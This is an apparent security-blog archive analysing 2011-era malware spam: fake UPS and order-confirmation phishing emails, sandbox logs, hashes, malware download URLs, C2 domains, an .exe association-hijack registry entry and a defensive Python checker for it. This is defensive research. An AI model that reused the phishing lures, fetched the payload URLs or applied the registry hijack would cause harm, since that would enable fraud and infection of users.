Tag Archives: malware

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:


URLVoid domain analysis:


Malware: United Parcel Service notification #46034

Suspicious email spreading malware:

Return-Path: <info52943@ups.com>
Received: from [39.203.6.87] (account 1361@ms21.hinet.net HELO ybydypsmsb.cehflcrileuz.ru)
From: "United Parcel Service" <info52943@ups.com>
Subject: United Parcel Service notification #46034

Message:

May 2011 United Parcel Service tracking number #18203
Good morning
Parcel notification
The parcel was sent your home adress. And it will arrive within 3 buisness days.
More information and the parcel tracking number are attached in document below.
Thank you
United Parcel Service of America (c) 153 James Street, Suite 100, Long Beach CA, 90000

Attached is a file with a ZIP extension:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-zip
File size: 9032 bytes
MD5 hash: 4e8bbc81f8a1ed3fcde3899546fef0c9
SHA1 hash: 56e4f46e75cbccf27dde19289250471ebb90c5ba
Detection rate: 4 on 5 (80%)
Status: INFECTED

AVG 14/06/2011 10.0.0.1190 FakeAlert
Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
ClamAV 14/06/2011 0.97 Suspect.Bredozip-zippwd-10
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-exe
File size: 24576 bytes
MD5 hash: fed91182ed9d29e36bbabac211ac7d3a
SHA1 hash: 17f308da31c8d61dd0b33691bf474e6f6fb5afbe
Detection rate: 2 on 5 (40%)
Status: INFECTED

Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

Report created by NoVirusThanks Automated Sandbox:

Process Created - %SAMPLE% - C:\WINDOWS\system32\svchost.exe - Microsoft Corporation - 73955B04F209D8A1C633867841267A96 - 14336 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %SAMPLE% - 24576 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /pusk3.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe - 9A4DB26B24C1FA9F59D7005B18BF1B6E - 17408 bytes - attr: [] - -
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\pusk3.exe - Microsoft Corporation - AFFF69E592B133B34B0FD2AB6AC67691 - 429056 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol.exe
Connection Established - %AppData%\IMPOST~1\Temp\pusk3.exe - TCP - 194.50.7.14 - 80
Web Request - %AppData%\IMPOST~1\Temp\pusk3.exe - GET - searcham.org - /404.php?type=stats&affid=531&subid=03&iruns
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe - 2984C3FF08E69000E841BF48436C55C9 - 66560 bytes - attr: [] - -
File Created - %AppData%\IMPOST~1\Temp\pusk3.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\404[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - 14/06/2011 11.46.01 - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol.exe - Unknown Publisher - F6C7505CC989D824EE2B6961F5EE1C2C - 79360 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol2.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol2.exe - Unknown Publisher - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 95.64.36.67 - 80
File Created - %AppData%\IMPOST~1\Temp\trol2.exe - %Temp%\2.tmp - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.33 - 80
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.34 - 80

URLVoid domain analysis:

http://www.urlvoid.com/scan/miliardov.com
http://www.urlvoid.com/scan/searcham.org

IPVoid IP address analysis:

http://www.ipvoid.com/scan/85.202.146.77
http://www.ipvoid.com/scan/194.50.7.14
http://www.ipvoid.com/scan/95.64.36.67
http://www.ipvoid.com/scan/94.60.123.33
http://www.ipvoid.com/scan/94.60.123.34

Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

Attached is a file with a ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates the following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
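The two values above replace Windows' stock executable-launch command, `"%1" %*`, so every .exe the user starts is handed to kdv.exe as an argument. The checker below is an added example, not part of the NoVirusThanks report: it takes exported (Default) values for the .exe and exefile command keys, flags any that deviate from the stock command and extracts the interposed program. The HKLM key and the sample export are constructed assumptions of this example.

```python
import re
from typing import Dict, List, Optional

# Windows' stock value for the executable file-association command: run the
# clicked program ("%1") with its original arguments (%*).
DEFAULT_EXE_COMMAND = '"%1" %*'

# Association keys worth auditing. The first two are the ones the sample
# rewrote; the HKLM entry is the machine-wide counterpart and is an added
# assumption of this checker, not something the report shows.
KEYS_TO_CHECK = (
    r"HKCU\Software\Classes\.exe\shell\open\command",
    r"HKCU\Software\Classes\exefile\shell\open\command",
    r"HKLM\Software\Classes\exefile\shell\open\command",
)

# First token of a command line: either a quoted path or a bare word.
_LEADING_PROGRAM = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def normalize_command(value: str) -> str:
    """Collapse whitespace so '"%1"  %*' compares equal to the stock value."""
    return " ".join(value.split())


def interposed_program(value: str) -> Optional[str]:
    """Return the program a non-default command launches first, or None.

    In a hijacked association the clicked executable is demoted to an
    argument (the "%1" token), so the leading token is the interposer.
    """
    if normalize_command(value) == DEFAULT_EXE_COMMAND:
        return None
    match = _LEADING_PROGRAM.match(value)
    if not match:
        return None
    program = match.group(1) or match.group(2)
    # A command that still starts with "%1" runs the clicked program itself.
    return None if program.strip('"') == "%1" else program


def audit_exe_associations(values: Dict[str, str]) -> List[dict]:
    """Flag every audited key whose (Default) value deviates from the stock one.

    `values` maps a registry key path to its exported (Default) value. A key
    absent from the mapping is not a finding: HKCU\\Software\\Classes\\.exe
    normally does not exist at all, so absence is the clean state.
    """
    findings = []
    for key in KEYS_TO_CHECK:
        value = values.get(key)
        if value is None:
            continue
        program = interposed_program(value)
        if program is not None:
            findings.append({"key": key, "value": value, "interposer": program})
    return findings


# Constructed sample export: the two values from the report (the report wraps
# each value in an extra pair of quotes; the real data is what is inside them)
# plus a clean HKLM entry for contrast.
SAMPLE_EXPORT = {
    r"HKCU\Software\Classes\.exe\shell\open\command": r'"%AppData%\kdv.exe" -a "%1" %*',
    r"HKCU\Software\Classes\exefile\shell\open\command": r'"%AppData%\kdv.exe" -a "%1" %*',
    r"HKLM\Software\Classes\exefile\shell\open\command": '"%1" %*',
}

if __name__ == "__main__":
    for finding in audit_exe_associations(SAMPLE_EXPORT):
        print(f"HIJACKED {finding['key']}: every .exe launch goes through "
              f"{finding['interposer']}")
```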

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net

Malware: Successfull Order 386284

Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.

This message is to inform you that your order has been received and is currently
being processed.

Your order reference is 061042.
You will need this in all correspondence.

This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.

You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and

Malware: Nova cotacao…

Honeypot reported a suspicious email:

Return-Path: <apache@94.229.165.236.srvlist.ukfast.net>
Received: from 94.229.165.236.srvlist.ukfast.net (94.229.165.236.srvlist.ukfast.net [94.229.165.236])
Received: from 94.229.165.236.srvlist.ukfast.net (unknown [127.0.0.1]) by 94.229.165.236.srvlist.ukfast.net
Received: by 94.229.165.236.srvlist.ukfast.net (Postfix, from userid 48)
Subject: Nova cotacao...
Date: Tue, 26 Apr 2011 07:14:29 +0100 (BST)

This is the malicious URL contained in the message:

gwayprototype. com/support/img/thumb2.php?#documento_relatorio
HTTP/1.1 302 Object Moved
Location: http://www.abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr
Server: Microsoft-IIS/4.0
Content-Type: text/html
Connection: close
Content-Length: 174

It redirects to the download of the infected file:

abeonas. net/abnor/,,/001/PLANILHA-DOCUMENTO.scr

Report 2011-04-25 23:05:38 (GMT 1)
File Name planilha-documento-scr
File Size 157184 bytes
File Type Executable File (EXE)
MD5 Hash 3e66cfb35fee0edeb86da90b0ef780d2
SHA1 Hash 18fdccc4927ad848e74ac742270a1673bf74c7bc
Detections: 5 / 10 (50 %)
Status INFECTED

AVG 25/04/2011 10.0.0.1190 Downloader.Rozena
Comodo 25/04/2011 4.0 TrojWare.Win32.Troja..
Emsisoft 25/04/2011 5.1.0.2 Trojan-PWS.Win32.QQR..
F-Prot 25/04/2011 6.3.3.4884 W32/SuspPack.R.gen!E..
Ikarus 25/04/2011 T31001097 Trojan-PWS.Win32.QQR..

Image of file: [screenshot not reproduced]

URLVoid domain analysis:

http://www.urlvoid.com/scan/abeonas.net
http://www.urlvoid.com/scan/gwayprototype.com

Free download cracked software with surprise

We have logged another website that targets software-related search keywords to spread the Renos trojan and other dangerous threats disguised as executable files of software cracks and keygens. The website uses blackhat SEO strategies to attract as many users as possible and to appear on the first pages of search engines.

[Screenshot of the cracked software website not reproduced]

The file that is downloaded from the dangerous website is:

[Screenshot of the downloaded file not reproduced]

Report 2010-10-28 02:11:21 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 435c56e76544772ae273a324066df2cc
SHA1 Hash 2df1627a8e6dd607ac79b8ed4d3d32ebbadc4bf5
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:11:44 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 80044a9b4867e9e45a465a5628de795f
SHA1 Hash 597ff8fd30eddd9b985fd26fff235277e585e81e
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:17 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 798c460f8a7af4a54f863ff68fec064a
SHA1 Hash 78d20e58b107111ca552d65137a65335375bd012
Detections: 2 / 16 (13 %)
Status INFECTED

Report 2010-10-28 02:15:39 (GMT 1)
File Name keygen-youtubeget-v5-8-youtube
File Size 180224 bytes
File Type Executable File (EXE)
MD5 Hash 1ec2315af5929d0462fc9c5dd1e6aaf1
SHA1 Hash d72d642b5f4a6e11766b274f64d2263263fd58ee
Detections: 2 / 16 (13 %)
Status INFECTED

An interesting thing is that every time we tried to download the infected file, it had a different MD5 checksum. This means that most probably the payload is created on the fly, or that various executable versions of the malware are stored on the server and served randomly. Possibly this is done to make sure the website always distributes an up-to-date malware executable that is not yet detected by security software.

During the analysis, the following files have been created in our system:

[Screenshot of the created files not reproduced]

Suspicious DNS queries:

megadataonline .net
mydynatri .net
zoozus .com
threezio .com
sina.com .cn
waytoall .com
topdworld .com
thevehic .com
ad.tlvmedia .com

Network traffic:

POST /muchahos.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: megadataonline .net
 
POST /logos/bd305e793bda3beeb28218754d729da6f334759cdd06b5446bb70c4cc2842087c284f404583eee08b/0485038023a/logo.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mydynatri .net
 
POST /werber/94653350334/217.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: zoozus .com
 
POST /perce/fd103eb9fbba9bfe524268857d427d06236465cccda62504eb372cece2b4b0e7c2e4a4b4984ebef88/1475f360f30/qwerce.gif HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: threezio .com
 
POST /borders.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: waytoall .com
 
POST /1wave.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topdworld .com
 
GET /2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d HTTP/1.1
Referer: hxxp://ovguide .com/
Host: thevehic .com
 
GET /st?ad_type=iframe&ad_size=120x600&section=1447253 HTTP/1.1
Referer: hxxp://thevehic .com/2wave.php?Yfe6r8FPBg1YhglTLRtwQVy4qRTSmZv0YN/d
Host: ad.tlvmedia .com

The malware appears to have sent a lot of encrypted data with POST requests to various website URLs and, at the end, received commands to visit some advertisement links.

Domain & IP Analysis:

Domain              IP               AS
sotapartners.net    174.123.211.138  21844
data-mortgage.com   78.46.76.170     24940
megadataonline.net  64.191.16.70     21788
mydynatri.net       77.78.248.84     42560
zoozus.com          85.234.190.47    6851
threezio.com        77.78.239.42     42560
waytoall.com        96.9.157.39      21788
topdworld.com       173.212.250.130  21788
thevehic.com        173.212.245.243  21788
ad.tlvmedia.com     217.163.21.37    42173

Other suspicious domains hosted on 64.191.16.70:

Domain               IP             AS
brodiero.com         64.191.16.70   21788
megadatacentral.net  64.191.16.70   21788
megadataonline.net   64.191.16.70   21788
spiderfile.net       87.255.51.229  38930

Other suspicious domains hosted on 85.234.190.47:

Domain            IP             AS
chattertune.net   85.234.190.47  6851
mybubblebean.com  -              NA
roonotimex.com    85.234.190.47  6851